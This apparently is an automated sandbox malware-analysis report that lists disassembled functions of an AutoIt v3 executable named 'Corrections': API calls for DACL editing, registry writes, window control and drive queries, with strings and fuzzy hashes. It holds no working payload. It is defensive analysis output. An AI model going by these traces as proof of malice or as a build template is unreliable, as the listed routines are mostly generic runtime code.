Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c2e8e2b26430d628915470a8774c591873940e1574442955268534e5a583d622
Instruction ID: eeb53b5f7112ecf8ad2cb91bf646da190c587912dc5adc3c6eb6c32484301b13
Opcode Fuzzy Hash: c2e8e2b26430d628915470a8774c591873940e1574442955268534e5a583d622
Instruction Fuzzy Hash: 9BB18E35A15209EFDB14DFA8DD45BAE7BB4FB48324F108229FA05A7294DBB4E840DF50

Function 009816D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
Part of subcall function 00981A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
Part of subcall function 00981A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
Part of subcall function 00981A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
Part of subcall function 00981A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00981741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00981775
GetLengthSid.ADVAPI32(?), ref: 0098178C
GetAce.ADVAPI32(?,00000000,?), ref: 009817C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009817E2
GetLengthSid.ADVAPI32(?), ref: 009817F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00981801
HeapAlloc.KERNEL32(00000000), ref: 00981808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00981829
CopySid.ADVAPI32(00000000), ref: 00981830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0098185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00981881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00981893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818BA
HeapFree.KERNEL32(00000000), ref: 009818C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818CA
HeapFree.KERNEL32(00000000), ref: 009818D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009818DA
HeapFree.KERNEL32(00000000), ref: 009818E1
GetProcessHeap.KERNEL32(00000000,?), ref: 009818ED
HeapFree.KERNEL32(00000000), ref: 009818F4

Part of subcall function 00981ADF: GetProcessHeap.KERNEL32(00000008,009814FD,?,00000000,?,009814FD,?), ref: 00981AED
Part of subcall function 00981ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009814FD,?), ref: 00981AF4
Part of subcall function 00981ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009814FD,?), ref: 00981B03

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8326aa1456dc499a811c66682f895519aec70e6f1c47f4edcee83001bac8341a
Instruction ID: 58dbda2bf6dd1e62ca6553b6bf2b6b2deda750182bb4c75e1360d540739ade07
Opcode Fuzzy Hash: 8326aa1456dc499a811c66682f895519aec70e6f1c47f4edcee83001bac8341a
Instruction Fuzzy Hash: 65714EB2D0520AABDF10EFA5ED45FAEBBBCBF44310F144225F915A6290E7319906CB61

Function 009ACE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009ACF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,009BDCD0,00000000,?,00000000,?,?), ref: 009ACFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 009AD004
_wcslen.LIBCMT ref: 009AD054
_wcslen.LIBCMT ref: 009AD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 009AD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 009AD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 009AD2AD
RegCloseKey.ADVAPI32(?), ref: 009AD2E1
RegCloseKey.ADVAPI32(00000000), ref: 009AD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 009AD3C0

Strings

REG_SZ, xrefs: 009AD0A4
REG_BINARY, xrefs: 009AD373
REG_DWORD, xrefs: 009AD264
REG_MULTI_SZ, xrefs: 009AD155
REG_QWORD, xrefs: 009AD323
REG_EXPAND_SZ, xrefs: 009AD02D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 82bea7549ba09d4cb303c72a37ef5f9aeefd1f9229f4e57ef7b80725cf019f6f
Instruction ID: b741d8a86039a2d7d44067e583f262ee649323478f53a40061f06aa4a75bf459
Opcode Fuzzy Hash: 82bea7549ba09d4cb303c72a37ef5f9aeefd1f9229f4e57ef7b80725cf019f6f
Instruction Fuzzy Hash: CF126775604211AFCB14EF14C885B2AB7E5FF89714F05889CF89A9B3A2DB31ED41CB81

Function 009B13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009B1462
_wcslen.LIBCMT ref: 009B149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B14F0
_wcslen.LIBCMT ref: 009B1526
_wcslen.LIBCMT ref: 009B15A2
_wcslen.LIBCMT ref: 009B161D

Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D

Part of subcall function 00983535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00983547

Strings

COLLAPSE, xrefs: 009B159D, 009B15B8
CHECK, xrefs: 009B1521, 009B153C
GETTEXT, xrefs: 009B1733
ISCHECKED, xrefs: 009B177D
EXISTS, xrefs: 009B1618, 009B1633
UNCHECK, xrefs: 009B17DA
GETTOTALCOUNT, xrefs: 009B148E, 009B14B3
EXPAND, xrefs: 009B1694
SELECT, xrefs: 009B17AD
GETITEMCOUNT, xrefs: 009B16BA
GETSELECTED, xrefs: 009B16EA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 98a784740f580e21be2e43763269fd33058d85fcf03e6727a4ce19b38ce9b341
Instruction ID: f4a8342166b6ae1b99e454b8a1f91c8e71ae28c97f93a863cad562ad0c7db471
Opcode Fuzzy Hash: 98a784740f580e21be2e43763269fd33058d85fcf03e6727a4ce19b38ce9b341
Instruction Fuzzy Hash: 0EE1AE316083418FC714EF24C6609AAB7E6BFD8324F54895CF8969B3A2DB30ED45CB81

Function 009AD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
_wcslen.LIBCMT ref: 009AD451
_wcslen.LIBCMT ref: 009AD4C8
_wcslen.LIBCMT ref: 009AD4FE
_wcslen.LIBCMT ref: 009AD559
_wcslen.LIBCMT ref: 009AD58F
_wcslen.LIBCMT ref: 009AD5DF

Strings

HKCU, xrefs: 009AD62E
HKLM, xrefs: 009AD4F8, 009AD4FD
HKEY_LOCAL_MACHINE, xrefs: 009AD4C2, 009AD4C7
HKEY_CURRENT_USER, xrefs: 009AD61D
HKU, xrefs: 009AD650
HKEY_CLASSES_ROOT, xrefs: 009AD553, 009AD558
HKCC, xrefs: 009AD60C
HKEY_CURRENT_CONFIG, xrefs: 009AD5D9, 009AD5DE
HKEY_USERS, xrefs: 009AD63F
HKCR, xrefs: 009AD589, 009AD58E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: ff5dbd5b3023285c71a8e866f67ac3bfc47a7ce93e9c03f9f34a4b7fa55397b8
Instruction ID: ab5cdee97bacc74c552d67b80e971aa5209811e3bb3cc595e93d49c1c65e7654
Opcode Fuzzy Hash: ff5dbd5b3023285c71a8e866f67ac3bfc47a7ce93e9c03f9f34a4b7fa55397b8
Instruction Fuzzy Hash: E7711672A0212A8BCB209E78CD406FF33D9AFA6754B250524F86B97698EB35DD44C7D0

Function 009B8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009B8DB5
_wcslen.LIBCMT ref: 009B8DC9
_wcslen.LIBCMT ref: 009B8DEC
_wcslen.LIBCMT ref: 009B8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009B8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009B6691), ref: 009B8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009B8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009B8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009B8F5C
FreeLibrary.KERNEL32(?), ref: 009B8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009B8F78
DestroyIcon.USER32(?,?,?,?,?,009B6691), ref: 009B8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009B8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009B8FB0

Strings

.dll, xrefs: 009B8E06
.icl, xrefs: 009B8DC3
.exe, xrefs: 009B8DE3

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: c2d1f9123d37d022a35bbcdb40766080cf9e13be9524cdaf647a3df583104efe
Instruction ID: 8499bc83f647794f9fbe9767bed3136e27daf55ba7e0094d015a2401a8e4e15c
Opcode Fuzzy Hash: c2d1f9123d37d022a35bbcdb40766080cf9e13be9524cdaf647a3df583104efe
Instruction Fuzzy Hash: BF61DF71910219BAEB149F64DD85FFF77ACAF08B20F104606F815D61D1EFB4A980DBA0

Function 009948BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0099493D
_wcslen.LIBCMT ref: 00994948
_wcslen.LIBCMT ref: 0099499F
_wcslen.LIBCMT ref: 009949DD
GetDriveTypeW.KERNEL32(?), ref: 00994A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00994ACC

Strings

type cdaudio alias cd wait, xrefs: 00994A46
close, xrefs: 00994943, 0099495D
set cd door , xrefs: 00994A6D
open, xrefs: 00994999, 0099499E
close cd wait, xrefs: 00994AB7
closed, xrefs: 0099494D, 00994972, 0099498B, 009949C3, 009949DC
wait, xrefs: 00994A89
open , xrefs: 00994A2A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 73ab9abbb685481c601e2ce37f1c4608695a06ab8790d17e6e6c45523840b54c
Instruction ID: 64c34e15fcb23f91d5ff52e853e77cd8eb86eed25aa17061bec56f141cb6d8b9
Opcode Fuzzy Hash: 73ab9abbb685481c601e2ce37f1c4608695a06ab8790d17e6e6c45523840b54c
Instruction Fuzzy Hash: 9071B0725082119FCB11EF28D880E6BB7E8EF98758F10492DF89597351EB31DD46CB92

Function 00986382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00986395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009863A7
SetWindowTextW.USER32(?,?), ref: 009863BE
GetDlgItem.USER32(?,000003EA), ref: 009863D3
SetWindowTextW.USER32(00000000,?), ref: 009863D9
GetDlgItem.USER32(?,000003E9), ref: 009863E9
SetWindowTextW.USER32(00000000,?), ref: 009863EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00986410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0098642A
GetWindowRect.USER32(?,?), ref: 00986433
_wcslen.LIBCMT ref: 0098649A
SetWindowTextW.USER32(?,?), ref: 009864D6
GetDesktopWindow.USER32 ref: 009864DC
GetWindowRect.USER32(00000000), ref: 009864E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0098653A
GetClientRect.USER32(?,?), ref: 00986547
PostMessageW.USER32(?,00000005,00000000,?), ref: 0098656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00986596

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: dbe720f559b3dcf32bb08f7d127584f46034728843006ac07a6bca0821d94694
Instruction ID: 1cebdf3dd9d01e26b7047656b62a8a2bf3ce28be6bd657c82d8fe7e7960bb089
Opcode Fuzzy Hash: dbe720f559b3dcf32bb08f7d127584f46034728843006ac07a6bca0821d94694
Instruction Fuzzy Hash: F1718D31900605EFDB20EFA8CE85BAEBBF9FF48714F100918E186A66A0D775E940DB50

Function 009A086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 009A0884
LoadCursorW.USER32(00000000,00007F8A), ref: 009A088F
LoadCursorW.USER32(00000000,00007F00), ref: 009A089A
LoadCursorW.USER32(00000000,00007F03), ref: 009A08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 009A08B0
LoadCursorW.USER32(00000000,00007F01), ref: 009A08BB
LoadCursorW.USER32(00000000,00007F81), ref: 009A08C6
LoadCursorW.USER32(00000000,00007F88), ref: 009A08D1
LoadCursorW.USER32(00000000,00007F80), ref: 009A08DC
LoadCursorW.USER32(00000000,00007F86), ref: 009A08E7
LoadCursorW.USER32(00000000,00007F83), ref: 009A08F2
LoadCursorW.USER32(00000000,00007F85), ref: 009A08FD
LoadCursorW.USER32(00000000,00007F82), ref: 009A0908
LoadCursorW.USER32(00000000,00007F84), ref: 009A0913
LoadCursorW.USER32(00000000,00007F04), ref: 009A091E
LoadCursorW.USER32(00000000,00007F02), ref: 009A0929
GetCursorInfo.USER32(?), ref: 009A0939
GetLastError.KERNEL32 ref: 009A097B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 5970e46c4a6d70d57d67e044a30f224c79c1b6caab5fff8adb2d2bafaa0dae3d
Instruction ID: dfa0152514a5f865dbec15e9facda3522029b370a4596cca479134fe61e96af5
Opcode Fuzzy Hash: 5970e46c4a6d70d57d67e044a30f224c79c1b6caab5fff8adb2d2bafaa0dae3d
Instruction Fuzzy Hash: DC4152B0D083196ADB109FBA8C8986EBFE8FF44754B50452AE11CE7291DB789801CF91

Function 00940436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00940436

Part of subcall function 0094045D: InitializeCriticalSectionAndSpinCount.KERNEL32(009F170C,00000FA0,72A42B44,?,?,?,?,00962733,000000FF), ref: 0094048C
Part of subcall function 0094045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00962733,000000FF), ref: 00940497
Part of subcall function 0094045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00962733,000000FF), ref: 009404A8
Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009404BE
Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009404CC
Part of subcall function 0094045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009404DA
Part of subcall function 0094045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940505
Part of subcall function 0094045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00940510

___scrt_fastfail.LIBCMT ref: 00940457

Part of subcall function 00940413: __onexit.LIBCMT ref: 00940419

Strings

kernel32.dll, xrefs: 009404A3
InitializeConditionVariable, xrefs: 009404B8
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00940492
SleepConditionVariableCS, xrefs: 009404C4
WakeAllConditionVariable, xrefs: 009404D2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 57cf70bbb556857cb1a615625c5f0ffdda6465dbc2d2d71e6097b6d0e709b80c
Instruction ID: 6b76ede25b66252819a48d0fef370acf69ce00921ab730c2a6a8769b2a627a5e
Opcode Fuzzy Hash: 57cf70bbb556857cb1a615625c5f0ffdda6465dbc2d2d71e6097b6d0e709b80c
Instruction Fuzzy Hash: 19210B32E5D705AFD7142BA5AD46F693798EFC4B75F000229FB05972D0EF749C009A91

Function 00983A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00983AD9
_wcslen.LIBCMT ref: 00983B44

Strings

CLASS, xrefs: 00983AD4, 00983AF1
REGEXPCLASS, xrefs: 00983BA1, 00983BB2
TEXT, xrefs: 00983DC8
INSTANCE, xrefs: 00983D9F
NAME, xrefs: 00983C81, 00983C92
CLASSNN, xrefs: 00983B3F, 00983B50

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: a169b669d2be14d1c5892361bd4d03a0b690f6a88c745ee608935fc6c9604046
Instruction ID: c8213228e3ac494141e5868d1fcb31031c3e051d26c0dc0af2436ce84cc7e840
Opcode Fuzzy Hash: a169b669d2be14d1c5892361bd4d03a0b690f6a88c745ee608935fc6c9604046
Instruction Fuzzy Hash: 28E1E332E04516ABCB28AF74C841BFEBBB8BF54B50F14C129E456E7350DB34AE458790

Function 00994F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,009BDCD0), ref: 00994F6C
_wcslen.LIBCMT ref: 00994F80
_wcslen.LIBCMT ref: 00994FDE
_wcslen.LIBCMT ref: 00995039
_wcslen.LIBCMT ref: 00995084
_wcslen.LIBCMT ref: 009950EC

Part of subcall function 0093FD52: _wcslen.LIBCMT ref: 0093FD5D

GetDriveTypeW.KERNEL32(?,009E7C10,00000061), ref: 00995188

Strings

fixed, xrefs: 0099507A, 0099507F
network, xrefs: 009950E2, 009950E7
all, xrefs: 00994F76, 00994F7B
removable, xrefs: 0099502F, 00995034
ramdisk, xrefs: 00995136
unknown, xrefs: 0099514D
cdrom, xrefs: 00994FD4, 00994FD9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 0c6f2e9b884a0b146d85ddcf81c3b0445b4bd0c933e518b1d5afe7c93f1bf567
Instruction ID: 49111bb16c8a3bb1d7359c028155337a7d33bbd2903839465b3162541f8a83ac
Opcode Fuzzy Hash: 0c6f2e9b884a0b146d85ddcf81c3b0445b4bd0c933e518b1d5afe7c93f1bf567
Instruction Fuzzy Hash: AFB1E1316087029FCB21DF2CD890A6BB7E9AFD4724F15491DF49A87295DB30DC85CB92

Function 009ABA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009ABBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC34
_wcslen.LIBCMT ref: 009ABC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC74
